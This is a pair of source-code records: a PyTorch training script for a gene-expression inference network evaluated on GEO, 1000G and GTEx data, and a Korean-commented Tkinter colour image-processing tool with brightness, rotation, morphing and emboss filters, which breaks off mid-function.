+{"seq_id":"358986235","text":"import argparse\nimport time\n\nimport numpy as np\nimport sys\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\n\nimport torch.optim as optim\n\nsys.path.append('/home/lvfengmao/wanggang/GeneInference/CoNet/')\n\nfrom utils.load_data import MyDataSet\nfrom model.CoNet_3000 import CoNet_3000\nfrom model.CoNet_6000_3000 import CoNet_6000_3000\nfrom model.CoNet_6000_4000_2000 import CoNet_6000_4000_2000\n'''\n1、定义超参数\n'''\n# 采用的网络模型\nMODEL = 'CoNet_6000_3000'\n# 训练批次数\nNUM_EPOCH = 200\n# batch的大小\nBATCH_SIZE = 5000\n# 输入维度大小\nIN_SIZE = 943\n# 输出维度大小\nOUT_SIZE = 9520\n'''AE'''\nHIDDEN_D1_SIZE = 6000\nHIDDEN_D2_SIZE = 3000\nHIDDEN_D3_SIZE = 1000\nD_SIZE = 1000\n# dropout\nDROPOUT_RATE_AE = 0.1\n# 学习率\nLEARNING_RATE_LR = 5e-4\nLEARNING_RATE_AE = 5e-4\n\ndef get_arguments():\n \"\"\"\n Parse all the arguments provided from the CLI.\n\n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"dense idea's arguments\")\n parser.add_argument(\"--model\", type=str, default=MODEL,\n help=\"the network structure that you want use,CoNet_3000? 
or CoNet_6000_3000 and so on\")\n    parser.add_argument(\"--num-epoch\", type=int, default=NUM_EPOCH,\n                        help=\"iter numbers\")\n    parser.add_argument(\"--batch-size\", type=int, default=BATCH_SIZE,\n                        help=\"batch's size\")\n    parser.add_argument(\"--hidden-d1-size\", type=int, default=HIDDEN_D1_SIZE,\n                        help=\"AE's first hidden layer's size\")\n    parser.add_argument(\"--hidden-d2-size\", type=int, default=HIDDEN_D2_SIZE,\n                        help=\"AE's second hidden layer's size\")\n    parser.add_argument(\"--hidden-d3-size\", type=int, default=HIDDEN_D3_SIZE,\n                        help=\"AE's third hidden layer's size\")\n    parser.add_argument(\"--d-size\", type=int, default=D_SIZE,\n                        help=\"AE's middle layer's size\")\n    parser.add_argument(\"--dropout-rate-ae\", type=float, default=DROPOUT_RATE_AE,\n                        help=\"dropout rate, 0.1,0.25?\")\n    parser.add_argument(\"--learning-rate-lr\", type=float, default=LEARNING_RATE_LR,\n                        help=\"learning rate of LR, 5e-4?\")\n    parser.add_argument(\"--learning-rate-ae\", type=float, default=LEARNING_RATE_AE,\n                        help=\"learning rate of AE, 5e-4?\")\n    return parser.parse_args()\n\nargs = get_arguments()\n\n\ndef main():\n    '''\n    2、读取数据\n    '''\n    print('loading data...')\n\n    tr_set = MyDataSet(x_path='../dataset/bgedv2_X_tr_float64.npy', y_path='../dataset/bgedv2_Y_tr_float64.npy')\n    tr_loader = torch.utils.data.DataLoader(tr_set, batch_size=args.batch_size, shuffle=True)\n\n    X_va = torch.from_numpy(np.array(np.load('../dataset/bgedv2_X_va_float64.npy'))).type(torch.FloatTensor).cuda()\n    Y_va = torch.from_numpy(np.array(np.load('../dataset/bgedv2_Y_va_float64.npy'))).type(torch.FloatTensor).cuda()\n\n    X_te = torch.from_numpy(np.array(np.load('../dataset/bgedv2_X_te_float64.npy'))).type(torch.FloatTensor).cuda()\n    Y_te = torch.from_numpy(np.array(np.load('../dataset/bgedv2_Y_te_float64.npy'))).type(torch.FloatTensor).cuda()\n\n    X_1000G = torch.from_numpy(np.array(np.load('../dataset/1000G_X_float64.npy'))).type(torch.FloatTensor).cuda()\n    Y_1000G = torch.from_numpy(np.array(np.load('../dataset/1000G_Y_float64.npy'))).type(torch.FloatTensor).cuda()\n\n    X_GTEx = torch.from_numpy(np.array(np.load('../dataset/GTEx_X_float64.npy'))).type(torch.FloatTensor).cuda()\n    Y_GTEx = torch.from_numpy(np.array(np.load('../dataset/GTEx_Y_float64.npy'))).type(torch.FloatTensor).cuda()\n\n    '''\n    2、定义网络\n    '''\n    net = globals()[args.model](IN_SIZE, OUT_SIZE, args.d_size, args.hidden_d1_size, args.hidden_d2_size,\n                                args.hidden_d3_size, args.dropout_rate_ae).cuda()\n    net = nn.DataParallel(net, device_ids=[0])\n    '''\n    3、定义Loss和优化器\n    '''\n\n    criterion = nn.MSELoss(reduction='sum')\n    net_optimizer = optim.Adam([\n        {'params': net.module.fcnet.parameters(), 'lr': args.learning_rate_lr},\n        {'params': net.module.encoder.parameters()},\n        {'params': net.module.decoder.parameters()}\n    ], lr=args.learning_rate_ae)\n    '''\n    4、开始训练网络\n    '''\n\n    MAE_te_best = 10.0\n    MAE_GTEx_best = 10.0\n    net_parameters_GEO = {}\n    net_parameters_GTEx = {}\n\n    outlog = open('../../res/CoNet/'+args.model+'.log', 'w')\n    log_str = '\\t'.join(map(str, ['epoch', 'MAE_va', 'MAE_te','MAE_1000G', 'MAE_GTEx', 'MAE_tr', 'time(sec)']))\n    print(log_str)\n    outlog.write(log_str + '\\n')\n    sys.stdout.flush()\n\n    for epoch in range(args.num_epoch):\n        for i, data in enumerate(tr_loader, 0):\n            t_old = time.time()\n            '''\n            开始训练了\n            '''\n            # forward\n            net.train()\n            x_batch, y_batch = data\n            x_batch = x_batch.type(torch.FloatTensor).cuda()\n            y_batch = y_batch.type(torch.FloatTensor).cuda()\n\n            y_fc,y_ae = net.module(x_batch, y_batch)\n\n            y_fc_loss = criterion(y_fc, 
y_batch)\n            y_ae_loss = criterion(y_ae, y_batch)\n            all_loss = y_fc_loss + y_ae_loss\n            # backward\n            net_optimizer.zero_grad()\n            all_loss.backward()\n            net_optimizer.step()\n\n            torch.cuda.empty_cache()\n\n            '''\n            开始验证了\n            '''\n            with torch.no_grad():\n                net.eval()\n                #计算output\n                va_outputs, _ = net.module(X_va, Y_va)\n                te_outputs, _ = net.module(X_te, Y_te)\n                l000G_outputs, _ = net.module(X_1000G, Y_1000G)\n                GTEx_outputs, _ = net.module(X_GTEx, Y_GTEx)\n\n                #计算MAE\n                MAE_tr = np.abs(y_batch.detach().cpu().numpy() - y_fc.detach().cpu().numpy()).mean()\n                MAE_va = np.abs(Y_va.detach().cpu().numpy() - va_outputs.detach().cpu().numpy()).mean()\n                MAE_te = np.abs(Y_te.detach().cpu().numpy() - te_outputs.detach().cpu().numpy()).mean()\n                MAE_1000G = np.abs(Y_1000G.detach().cpu().numpy() - l000G_outputs.detach().cpu().numpy()).mean()\n                MAE_GTEx = np.abs(Y_GTEx.detach().cpu().numpy() - GTEx_outputs.detach().cpu().numpy()).mean()\n\n\n            t_new = time.time()\n            log_str = '\\t'.join(\n                map(str, [(epoch * np.ceil(88807/args.batch_size)) + i + 1, '%.6f' % MAE_va, '%.6f' % MAE_te,\n                          '%.6f' % MAE_1000G, '%.6f' % MAE_GTEx,\n                          '%.6f' % MAE_tr, int(t_new - t_old)]))\n            print(log_str)\n            outlog.write(log_str + '\\n')\n            sys.stdout.flush()\n            # 保留最优MAE_te\n            if MAE_te < MAE_te_best:\n                MAE_te_best = MAE_te\n                net_parameters_GEO = net.state_dict()\n            if MAE_GTEx < MAE_GTEx_best:\n                MAE_GTEx_best = MAE_GTEx\n                net_parameters_GTEx = net.state_dict()\n        print(\"epoch %d training over\" % epoch)\n    # 保存训练出来的模型\n    torch.save(net_parameters_GEO, '../../res/CoNet/' + args.model + '_GEO.pt')\n    torch.save(net_parameters_GTEx, '../../res/CoNet/' + args.model + '_GTEx.pt')\n    print('MAE_te_best : %.6f' % (MAE_te_best))\n    print('MAE_GTEx_best : %.6f' % (MAE_GTEx_best))\n    outlog.write('MAE_te_best : %.6f' % (MAE_te_best) + '\\n')\n    outlog.write('MAE_GTEx_best : %.6f' % (MAE_GTEx_best) + '\\n')\n    outlog.close()\n    print('Finish Training')\nmain()","sub_path":"pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"98768152","text":"# 컴퓨터 비전(딥러닝) 칼러비전을 완료하기\r\n# <심화> 추가로 기능을 구현하기\r\n\r\nfrom tkinter import *\r\nfrom tkinter.simpledialog import *\r\nfrom tkinter.filedialog import *\r\nimport math\r\nimport os\r\nimport os.path\r\nimport pymysql\r\nimport numpy as np\r\nfrom PIL import Image, ImageFilter, ImageEnhance, ImageOps\r\nimport time\r\n# 파일을 선택해서 메모리로 로딩하는 함수\r\n\r\n####################\r\n# 메모리를 할당해서 리스트(참조)를 반환하는 함수\r\ndef malloc(h, w, initValue=0) :\r\n    retMemory= []\r\n    for _ in range(h) :\r\n        tmpList = []\r\n        for _ in range(w) :\r\n            tmpList.append(initValue)\r\n        retMemory.append(tmpList)\r\n    return retMemory\r\n\r\n# 파일을 메모리로 로딩하는 함수\r\ndef loadImageColor(fname) :\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    global photo\r\n    inImage = []\r\n    photo = Image.open(fname) # PIL 객체\r\n    inW = photo.width; inH=photo.height # 불러오는 사진의 크기\r\n    ## 메모리 확보\r\n    for _ in range(3) : # 3면 확보\r\n        inImage.append(malloc(inH, inW))\r\n    photoRGB = photo.convert('RGB') # RGB색을 만들기 위함.\r\n    print(photoRGB)\r\n    for i in range(inH) :\r\n        for k in range(inW) :\r\n            r, g, b = photoRGB.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. 
jpg이기 때문에 기존 raw와는 다르다.\r\n inImage[R][i][k] = r\r\n inImage[G][i][k] = g\r\n inImage[B][i][k] = b\r\n\r\ndef openImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage,inH, inW, outH, outW\r\n filename = askopenfilename(parent=window,\r\n filetypes=((\"칼라 파일\", \"*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if filename == '' or filename == None :\r\n return\r\n loadImageColor(filename) # load를 하면, 불러온 사진에서 inImage의 픽셀 값이 저장됨.\r\n equalImageColor()\r\n\r\ndef displayImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n if canvas != None : # 예전에 실행한 적이 있다.\r\n canvas.destroy()\r\n global VIEW_X, VIEW_Y\r\n #가로/세로 비율 계산\r\n ratio = outH / outW\r\n ## 고정된 화면 크기\r\n if outH <= VIEW_Y or outW <= VIEW_X:\r\n VIEW_X = outW\r\n VIEW_Y = outH\r\n step = 1\r\n else:\r\n VIEW_X = 512\r\n VIEW_Y = 512\r\n step = outW / VIEW_X\r\n\r\n window.geometry(str(int(VIEW_X*1.2)) + 'x' + str(int(VIEW_Y*1.2))) # 벽\r\n canvas = Canvas(window, height=VIEW_Y, width=VIEW_X)\r\n paper = PhotoImage(height=VIEW_Y, width=VIEW_X)\r\n canvas.create_image((VIEW_X // 2, VIEW_Y // 2), image=paper, state='normal')\r\n\r\n import numpy\r\n rgbStr = '' # 전체 픽셀의 문자열을 저장\r\n for i in numpy.arange(0,outH, step) :\r\n tmpStr = ''\r\n for k in numpy.arange(0,outW, step) :\r\n i = int(i); k = int(k)\r\n r , g, b = outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]\r\n tmpStr += ' #%02x%02x%02x' % (r,g,b)\r\n rgbStr += '{' + tmpStr + '} '\r\n paper.put(rgbStr)\r\n canvas.pack(expand=1, anchor=CENTER)\r\n status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\r\n\r\n\r\nimport numpy as np\r\n# JGG 파일이 임시 저장소에 저장. (AppData) -> 참고로, RAW와 jpg 저장 방식은 다르다.(내가 여기서 고민 많이 함.)\r\ndef saveImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n if outImage == None :\r\n return\r\n outArray = []\r\n for i in range(outH):\r\n tmpList = []\r\n for k in range(outW):\r\n tup = tuple([outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]])\r\n tmpList.append(tup)\r\n outArray.append(tmpList)\r\n\r\n outArray = np.array(outArray)\r\n savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')\r\n saveFp = asksaveasfile(parent=window, mode='wb',\r\n defaultextension='.', filetypes=((\"그림 파일\", \"*.png;*.jpg;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if saveFp == '' or saveFp == None:\r\n return\r\n\r\n savePhoto.save(saveFp.name)\r\n print('Save~')\r\n\r\n###############################################\r\n##### 컴퓨터 비전(영상처리) 알고리즘 함수 모음 #####\r\n###############################################\r\n# 동일영상 알고리즘\r\ndef equalImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n for RGB in range(3) : # RGB가 0면, 1면, 2면으로 값이 저장됨.\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n outImage[RGB][i][k] = inImage[RGB][i][k]\r\n #############################\r\n displayImageColor()\r\n\r\ndef addImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 
출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ## 메모리 확보\r\n outImage = [] # 이미지를 불러올 때 outImage에 값이 저장되어 있기 때문에 초기화를 시켜줘야 한다.\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n value = askinteger(\"밝게/어둡게\", \"값-->\", minvalue=-255, maxvalue=255)\r\n for RGB in range(3) :\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n if inImage[RGB][i][k] + value > 255 :\r\n outImage[RGB][i][k] = 255\r\n elif inImage[RGB][i][k] + value < 0 :\r\n outImage[RGB][i][k] = 0\r\n else :\r\n outImage[RGB][i][k] = inImage[RGB][i][k] + value\r\n #############################\r\n displayImageColor()\r\n\r\ndef revImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = 255 - inImage[RGB][i][k]\r\n #############################\r\n displayImageColor()\r\n\r\ndef paraImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\\\r\n LUT = [0 for _ in range(256)]\r\n for input in range(256):\r\n LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2)) # 파라볼라 값을 적용한 픽셀.\r\n\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = LUT[inImage[RGB][i][k]]\r\n #############################\r\n displayImageColor()\r\n\r\ndef morphImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 추가 영상 선택\r\n filename2 = askopenfilename(parent=window,\r\n filetypes=((\"칼라 파일\", \"*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if filename2 == '' or filename2 == None:\r\n return\r\n inImage2 = []\r\n photo2 = Image.open(filename2) # PIL 객체\r\n inW2 = photo2.width; inH2=photo2.height\r\n ## 메모리 확보\r\n for _ in range(3) :\r\n inImage2.append(malloc(inH2, inW2))\r\n\r\n photoRGB2 = photo2.convert('RGB')\r\n for i in range(inH2) :\r\n for k in range(inW2) :\r\n r, g, b = photoRGB2.getpixel((k,i))\r\n inImage2[R][i][k] = r\r\n inImage2[G][i][k] = g\r\n inImage2[B][i][k] = b\r\n\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n\r\n import threading\r\n import time\r\n def morpFunc():\r\n w1 = 1;\r\n w2 = 0\r\n for _ in range(20): # 20번 깜빡\r\n for RGB in range(3) :\r\n for i in range(inH):\r\n for k in range(inW):\r\n newValue = int(inImage[RGB][i][k] * w1 + inImage2[RGB][i][k] * w2) # 하나는 꺼지고, 다른 하나는 켜지는 과정.\r\n if newValue > 255:\r\n newValue = 255\r\n elif newValue < 0:\r\n newValue = 0\r\n outImage[RGB][i][k] = newValue\r\n displayImageColor()\r\n w1 -= 0.05 # 점점 픽셀 값이 작아지고,\r\n w2 += 0.05 # 점점 픽셀 값이 커짐.\r\n time.sleep(0.5) # 시간을 0.5초로 잡자.\r\n\r\n threading.Thread(target=morpFunc).start()\r\n\r\n# 상하반전 알고리즘\r\ndef upDownImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 
출력영상 크기 결정 ##\r\n    outH = inH; outW = inW;\r\n    ###### 메모리 할당 ################\r\n    outImage = [];\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n    for RGB in range(3) :\r\n        for i in range(inH) :\r\n            for k in range(inW) :\r\n                outImage[RGB][inH-i-1][k] = inImage[RGB][i][k]\r\n    displayImageColor()\r\n\r\n# 화면이동 알고리즘\r\ndef moveImageColor():\r\n    global panYN\r\n    panYN = True # 마우스가 먹음\r\n    canvas.configure(cursor = 'mouse')\r\n\r\ndef mouseClick(event):\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx, sy, ex, ey, panYN\r\n    if panYN == False: # 진행하지 말아라. 마우스 클릭 해봤자 아무 반응도 안함.\r\n        return\r\n    sx = event.x; sy = event.y # 클릭해라.\r\n\r\ndef mouseDrop(event):\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx, sy, ex, ey, panYN\r\n    if panYN == False: # 진행하지 말아라. 마우스 클릭 해봤자 아무 반응도 안함.\r\n        return\r\n    ex = event.x; ey = event.y\r\n    ## 중요! 코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ###################################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ########진짜 컴퓨터 비전 알고리즘 ########\r\n    mx = sx - ex; my = sy - ey # x, y에 대한 이동 양\r\n    for RGB in range(3):\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                if 0 <= i-my < outH and 0 <= k-mx < outW:\r\n                    outImage[RGB][i-my][k-mx] = inImage[RGB][i][k]\r\n    panYN = False\r\n    displayImageColor()\r\n\r\n# 영상 축소 알고리즘\r\ndef zoomOutImageColor() :\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    scale = askinteger(\"축소\", \"값-->\", minvalue=2, maxvalue=16)\r\n    ## 중요! 코드. 출력영상 크기 결정 ##\r\n    outH = inH//scale; outW = inW//scale;\r\n    ###### 메모리 할당 ################\r\n    outImage = [];\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n    for RGB in range(3) :\r\n        for i in range(outH) :\r\n            for k in range(outW) :\r\n                outImage[RGB][i][k] = inImage[RGB][i*scale][k*scale]\r\n\r\n    displayImageColor()\r\n\r\n# 영상 확대 알고리즘\r\ndef zoomInImageColor() :\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    scale = askinteger(\"확대\", \"값-->\", minvalue=2, maxvalue=8)\r\n    ## 중요! 코드. 출력영상 크기 결정 ##\r\n    outH = inH*scale; outW = inW*scale;\r\n    ###### 메모리 할당 ################\r\n    outImage = [];\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n    for RGB in range(3) :\r\n        for i in range(outH) :\r\n            for k in range(outW) :\r\n                outImage[RGB][i][k] = inImage[RGB][i//scale][k//scale]\r\n    displayImageColor()\r\n\r\n# 영상 회전 알고리즘\r\ndef rotateImageColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    angle = askinteger(\"회전\", \"값~~>\", minvalue=1, maxvalue=360)\r\n    ## 중요! 
코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ############메모리 할당###################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ########진짜 컴퓨터 비전 알고리즘 ########\r\n    radian = angle * math.pi / 180\r\n    for RGB in range(3):\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                xs = i; ys = k;\r\n                xd = int(math.cos(radian) * xs - math.sin(radian) *ys)\r\n                yd = int(math.sin(radian) * xs + math.cos(radian) *ys)\r\n                if 0 <= xd < inH and 0 <= yd < inW :\r\n                    outImage[RGB][xd][yd] = inImage[RGB][i][k]\r\n    displayImageColor()\r\n\r\n# 영상 회전 알고리즘 - 중심, 역방향\r\ndef rotateImage2Color() :\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    angle = askinteger(\"회전\", \"값-->\", minvalue=1, maxvalue=360)\r\n    ## 중요! 코드. 출력영상 크기 결정 ##\r\n    outH = inH; outW = inW;\r\n    ###### 메모리 할당 ################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n    radian = angle * math.pi / 180\r\n    cx = inW//2; cy = inH//2 # (cx, cy)는 중심점.\r\n    for RGB in range(3):\r\n        for i in range(outH) :\r\n            for k in range(outW) :\r\n                xs = i ; ys = k;\r\n                xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx\r\n                yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy\r\n                if 0<= xd < outH and 0 <= yd < outW :\r\n                    outImage[RGB][xs][ys] = inImage[RGB][xd][yd]\r\n                else :\r\n                    outImage[RGB][xs][ys] = 255\r\n\r\n    displayImageColor()\r\n\r\n# 엠보싱 처리\r\ndef embossImageRGB():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    ## 중요! 코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ###################################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ########진짜 컴퓨터 비전 알고리즘 ########\r\n    MSIZE = 3\r\n    mask = [ [-1, 0, 0],\r\n             [ 0, 0, 0],\r\n             [ 0, 0, 1] ]\r\n\r\n    ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n    tmpInImage, tmpOutImage = [], []\r\n    for _ in range(3):\r\n        tmpInImage.append(malloc(inH + (MSIZE - 1), inW + (MSIZE -1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n    for _ in range(3):\r\n        tmpOutImage.append(malloc(outH, outW))\r\n    ## 원 입력 ~~> 임시 입력\r\n    for RGB in range(3):\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                tmpInImage[RGB][i+MSIZE//2][k+MSIZE//2] = inImage[RGB][i][k] # 바깥 쪽 값 입력\r\n    ## 회선연산\r\n    for RGB in range(3):\r\n        for i in range(MSIZE//2, inH + MSIZE//2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n            for k in range(MSIZE//2, inW + MSIZE//2):\r\n                # 각 점을 처리\r\n                S = 0.0# S는 누적값\r\n                for m in range(0, MSIZE):\r\n                    for n in range(0, MSIZE):\r\n                        S += mask[m][n] * tmpInImage[RGB][i + m - MSIZE//2][k + n - MSIZE//2]\r\n                tmpOutImage[RGB][i-MSIZE//2][k-MSIZE//2] = S\r\n    ## 127 더하기 -> 선택해서 진행.\r\n    for RGB in range(3):\r\n        for i in range(outH):\r\n            for k in range(outW):\r\n                tmpOutImage[RGB][i][k] += 127\r\n    for RGB in range(3):\r\n        ## 임시 출력 --> 원 출력\r\n        for i in range(outH):\r\n            for k in range(outW):\r\n                value = tmpOutImage[RGB][i][k]\r\n                if value > 255:\r\n                    value = 255\r\n                elif value < 0:\r\n                    value = 0\r\n                outImage[RGB][i][k] = int(value)\r\n    displayImageColor()\r\n\r\ndef embossImagePillow():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global photo\r\n    ## 중요! 코드, 출력영상 크기 결정 ##\r\n    photo2 = photo.copy()\r\n    photo2 = photo2.filter(ImageFilter.EMBOSS)\r\n    ## 중요! 
코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ############메모리 할당################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    for i in range(outH) :\r\n        for k in range(outW) :\r\n            r, g, b = photo2.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. jpg이기 때문에 기존 raw와는 다르다.\r\n            outImage[R][i][k] = r\r\n            outImage[G][i][k] = g\r\n            outImage[B][i][k] = b\r\n    displayImageColor()\r\n\r\nimport colorsys\r\nsx, sy, ex, ey = [0] * 4# start, end\r\ndef embossImageHSV(): # 마우스 입력 받고 처리를 할 것임. 후에 밑에 __에서 emboss 처리가 진행 될 것임.\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx,sy,ex,ey\r\n    ## 이벤트 바인드\r\n    canvas.bind(\"<Button-3>\", rightMouseClick_embossImageHSV) # <Button-3>은 오른쪽 버튼\r\n    canvas.bind(\"<Button-1>\", leftMouseClick)\r\n    canvas.bind(\"<B1-Motion>\", leftMouseMove)\r\n    canvas.bind(\"<ButtonRelease-1>\", leftMouseDrop_embossImageHSV)\r\n    canvas.configure(cursor='mouse')\r\n\r\ndef leftMouseDrop_embossImageHSV(event):\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx, sy, ex, ey\r\n    ex = event.x\r\n    ey = event.y\r\n    #####################\r\n    __embossImageHSV()\r\n    #####################\r\n    canvas.unbind(\"<Button-3>\") # <Button-3>은 오른쪽 버튼\r\n    canvas.unbind(\"<Button-1>\")\r\n    canvas.unbind(\"<B1-Motion>\")\r\n    canvas.unbind(\"<ButtonRelease-1>\")\r\n\r\nboxLine = None\r\ndef leftMouseMove(event):\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx,sy,ex,ey, boxLine\r\n    ex = event.x; ey = event.y\r\n    #움직일 때마다 사진이 움직이고, 앞쪽은 지워져야 함.\r\n    if not boxLine:\r\n        pass\r\n    else:\r\n        canvas.delete(boxLine)\r\n    boxLine = canvas.create_rectangle(sx,sy,ex,ey,fill=None)\r\n\r\ndef leftMouseClick(event):\r\n    global sx,sy,ex,ey\r\n    sx = event.x; sy = event.y\r\n\r\ndef rightMouseClick_embossImageHSV(event): # 마우스 오른쪽 버튼 드래그 하면 엠보싱 HSV 처리가 됨.\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    global sx, sy, ex, ey\r\n    sx = 0; sy = 0; ex = inH - 1; ey = inW - 1 # 마지막 점까지 인정해주기 위해 -1을 함. 0 ~ inH-1\r\n    #####################\r\n    __embossImageHSV()\r\n    #####################\r\n    canvas.unbind(\"<Button-3>\") # <Button-3>은 오른쪽 버튼\r\n    canvas.unbind(\"<Button-1>\")\r\n    canvas.unbind(\"<B1-Motion>\")\r\n    canvas.unbind(\"<ButtonRelease-1>\")\r\n\r\ndef __embossImageHSV():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    ## 입력 RGB --> 입력 HSV\r\n    ## 메모리 확보\r\n    inImageHSV = []\r\n    for _ in range(3):\r\n        inImageHSV.append(malloc(inH, inW))\r\n    #RGB -> HSV\r\n    for i in range(inH):\r\n        for k in range(inW):\r\n            r, g, b = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n            h, s, v = colorsys.rgb_to_hsv(r/255, g/255, b/255)\r\n            ## 색상(Hue), 채도(Saturation), 명도(Value)\r\n            ## RGB는 0~255까지 받는데, HSV는 0~1.0까지로 받을 수 있음.\r\n            inImageHSV[0][i][k], inImageHSV[1][i][k], inImageHSV[2][i][k] = h, s, v\r\n            ## h,s,v를 inImageHSV에 저장함.\r\n\r\n    ## 중요! 
